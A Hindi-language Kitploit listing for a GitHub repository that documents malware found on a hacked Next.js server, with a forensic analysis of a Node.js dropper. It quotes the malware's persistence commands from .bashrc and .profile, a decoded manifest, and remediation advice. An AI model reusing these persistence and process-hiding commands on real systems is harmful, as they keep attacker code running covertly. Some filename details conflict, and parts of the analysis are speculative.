Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react-cve-2025-55182 — malware I found on my server | Kitploit
उपकरण/GitHubGitHub/stonelinks/react-cve-2025-55182
Persistence MechanismsReverse EngineeringData ExfiltrationForensicsMalware AnalysisCommand and ControlThreat IntelligenceIncident ResponsePayload Development
GitHubstonelinks/react-cve-2025-55182

react-cve-2025-55182

malware I found on my server

8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

react-cve-2025-55182

यह मैलवेयर और अन्य संदिग्ध कचरे का एक डंप है जो मुझे मेरी शादी की वेबसाइट के सर्वर पर मिला, जो react सर्वर साइड रेंडरिंग कोड निष्पादन शोषण के बाद हुआ। यह एक छोटा डिजिटल ओशन ड्रॉपलेट है जो एक सामान्य next js ऐप चला रहा है।

CVE: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

सर्वर गतिविधि का एक लॉग जो विभिन्न स्पाइक्स और अन्य चीज़ें दिखाता है: image

मुख्य खलनायक /.local/share/.r0qsv8h1 में स्थापित यह चीज़ प्रतीत होता है।

मुझे जो मिला

मेरे bashrc में:

root@kitploit:~
# System
(nohup /.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null
pgrep -f mesh | xargs -I {} mount -n --bind /dev/shm /proc/{} 2>/dev/null

ध्यान दें कि pgreps इस अन्य नकली "meshagent" मैलवेयर को चलने से रोकने के लिए हैं। आप इसके बारे में MESHAGENT.md दस्तावेज़ में पढ़ सकते हैं।

मेरे प्रोफ़ाइल में भी यही है:

root@kitploit:~
# App
(/.local/share/.r0qsv8h1/.394ly8v9/bin/node /.local/share/.r0qsv8h1/.fvq2lzl64e.js >/dev/null 2>&1 &) 2>/dev/null

आप SUSPICIOUS_SERVICES.md में अन्य संदिग्ध सेवाएँ देख सकते हैं।

यहाँ इस मुख्य बुरे मैलवेयर का विश्लेषण है:

/.local/ सामग्री का अवलोकन

निर्देशिका bad में एक स्व-निहित Node.js रनटाइम है जो भारी रूप से अस्पष्टीकृत JavaScript फ़ाइलों के एक सेट के साथ बंडल किया गया है।
सभी सबूत बताते हैं कि यह एक दुर्भावनापूर्ण ड्रॉपर है जो चुपचाप एक रिमोट सर्वर से संपर्क करता है, एक एन्क्रिप्टेड पेलोड डाउनलोड करता है, इसे डिक्रिप्ट करता है, इसे डिस्क पर लिखता है, और इसे एक अलग पृष्ठभूमि प्रक्रिया के रूप में निष्पादित करता है। कोड समय-समय पर सर्वर पर अपडेट की जाँच भी करता है।

फ़ाइलें और उनका उद्देश्य

मैनिफेस्ट डिकोडिंग

.5f8562 में Base64 पेलोड डिकोड होकर:

root@kitploit:~
{
  "0": "c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c",
  "1": ".fvq2lzj6te.js",
  "3": 1765307786421,
  "4": "desktop"
}
  • कुंजी "1" मुख्य अस्पष्टीकृत लोडर स्क्रिप्ट को संदर्भित करती है।
  • कुंजी "0" एक UUID है जिसका उपयोग संभवतः रिमोट सर्वर द्वारा ट्रैकिंग के लिए किया जाता है।
  • कुंजी "3" एक टाइमस्टैम्प (Unix‑epoch ms) है जो बताता है कि मैनिफेस्ट कब उत्पन्न हुआ था।
  • कुंजी "4" इच्छित स्थान (desktop) को इंगित करती है, जो संकेत देती है कि पेलोड वहां खुद को छिपाने की कोशिश कर सकता है।

निष्पादन प्रवाह

  1. बूटस्ट्रैप – जब बंडल किया गया Node बाइनरी शुरू होता है (जैसे, node .5f8562), मैनिफेस्ट .fvq2lzj6te.js की ओर इशारा करता है।
  2. डाउनलोडर – लोडर एक रिमोट कमांड‑एंड‑कंट्रोल सर्वर के लिए एक JSON‑RPC अनुरोध बनाता है, एक base64-एन्कोडेड ब्लॉब प्राप्त करता है, और इसे एक कस्टम RC4-जैसे एल्गोरिदम का उपयोग करके डिक्रिप्ट करता है।
  3. पेलोड तैनाती – डिक्रिप्टेड डेटा को उपयोगकर्ता के वातावरण में एक यादृच्छिक-नाम वाली फ़ाइल में लिखा जाता है और एक अलग चाइल्ड प्रक्रिया के रूप में निष्पादित किया जाता है।
  4. दृढ़ता / अद्यतन लूप – एक setInterval टाइमर समय-समय पर डाउनलोड‑डिक्रिप्ट‑रन अनुक्रम को दोहराता है, जिससे हमलावर बिना किसी और उपयोगकर्ता इंटरैक्शन के नए या अद्यतन पेलोड धकेल सकता है।
  5. पृष्ठभूमि निष्पादन – उत्पन्न प्रक्रिया अपने स्वयं के वातावरण (PATH, cwd, आदि) के साथ चलती है और विशिष्ट दुर्भावनापूर्ण क्रियाएं जैसे क्रिप्टोमाइनिंग, क्रेडेंशियल चुराना, या रिमोट कमांड निष्पादन कर सकती है।

संभावित प्रभाव

  • सिस्टम समझौता – Node रनटाइम लॉन्च करने वाले उपयोगकर्ता के विशेषाधिकारों के साथ मनमाना कोड निष्पादन।
  • दृढ़ता – आवधिक पोलिंग सुनिश्चित करती है कि मैलवेयर को किसी भी समय ताज़ा या बदला जा सकता है।
  • संसाधन दुरुपयोग – संभवतः CPU-गहन कार्य (जैसे, क्रिप्टोकरेंसी माइनिंग) चलाता है या डेटा बाहर निकालता है।
  • चुपके – फ़ाइलें भारी रूप से अस्पष्टीकृत हैं और एक वैध-दिखने वाले Node README की उपस्थिति दुर्भावनापूर्ण प्रकृति को छिपाने में मदद करती है।

सिफारिशें

  1. तत्काल हटाना – संपूर्ण .r0qsv8h1 निर्देशिका और उसके द्वारा बनाई गई कोई भी फ़ाइल हटाएं (नवनिर्मित निष्पादन योग्य के लिए उपयोगकर्ता के Desktop और अस्थायी निर्देशिकाओं की जाँच करें)।
  2. सिस्टम स्कैन – किसी भी अवशिष्ट घटक का पता लगाने के लिए होस्ट पर एक प्रतिष्ठित एंटी-मैलवेयर स्कैनर चलाएं।
  3. निष्पादन पथ सत्यापित करें – सुनिश्चित करें कि कोई स्टार्टअप स्क्रिप्ट या शेड्यूल किए गए कार्य इस निर्देशिका में फ़ाइलों का संदर्भ नहीं देते हैं।
  4. नेटवर्क निगरानी – प्रभावित मशीन से अज्ञात आईपी/होस्ट के लिए आउटबाउंड कनेक्शन ब्लॉक करें और संदिग्ध आउटबाउंड अनुरोधों के लिए हाल के नेटवर्क ट्रैफ़िक की समीक्षा करें।
  5. सुरक्षा नीतियां अपडेट करें – अज्ञात बाइनरी और स्क्रिप्ट के निष्पादन को प्रतिबंधित करें, विशेष रूप से उपयोगकर्ता-लेखन योग्य स्थानों पर डाउनलोड की गई।

यह विश्लेषण निर्देशिका में मौजूद फ़ाइलों की स्थैतिक जांच के आधार पर एक AI सहायक द्वारा स्वचालित रूप से किया गया था। कोई रनटाइम निष्पादन नहीं किया गया था।

आप DEOBFUSCATE.md में और पढ़ सकते हैं।

टूल डाउनलोड करें
फ़ाइलविवरण
.394ly8v9/README.mdमानक Node.js README – दुर्भावनापूर्ण कार्यक्षमता से संबंधित नहीं; बंडल को वैध दिखाने के लिए ही मौजूद है।
.fvq2lzl64e.js~5 KB अस्पष्टीकृत JavaScript। यह एक JSON‑RPC HTTP अनुरोध बनाता है, एक base64-एन्कोडेड पेलोड प्राप्त करता है, इसे एक कस्टम सिफर से डिक्रिप्ट करता है, पेलोड को एक यादृच्छिक फ़ाइल में लिखता है, और इसे child_process.spawn / execSync के माध्यम से निष्पादित करता है। यह एक अलग पृष्ठभूमि प्रक्रिया भी उत्पन्न करता है जो बार-बार रिमोट सर्वर को पोल करता है।
.lauphhtqrg.js~13 KB अस्पष्टीकृत JavaScript। अपने स्वयं के RC4-शैली सिफर (dec) के साथ एक समान डाउनलोड‑डिक्रिप्ट‑रन लूप लागू करता है। डिक्रिप्टेड पेलोड को एक उत्पन्न फ़ाइलनाम पर लिखता है और इसे चलाता है। बाद में नए पेलोड लाने के लिए एक टाइमर सेट करता है।
.5f8562सादा-पाठ Base64 स्ट्रिंग। एक छोटे JSON मैनिफेस्ट में डिकोड होता है: json { "0":"c6aeb84b-0600-4e82-ae3e-f7d441a2fd7c", "1":".fvq2lzj6te.js", "3":1765307786421, "4":"desktop" } यह मैनिफेस्ट लोडर को बताता है कि कौन सी स्क्रिप्ट निष्पादित करनी है (.fvq2lzj6te.js) और एक पहचानकर्ता/टाइमस्टैम्प प्रदान करता है।
.b0rtqscrkeovअभी तक जांचा नहीं गया, लेकिन नामकरण पैटर्न बताता है कि यह उसी दुर्भावनापूर्ण श्रृंखला का एक और घटक है।
bin/node और साथ में lib/ फ़ाइलेंएक पूर्ण Node.js रनटाइम, जो स्क्रिप्ट को सिस्टम पर चलाने की अनुमति देता है भले ही Node.js स्थापित न हो।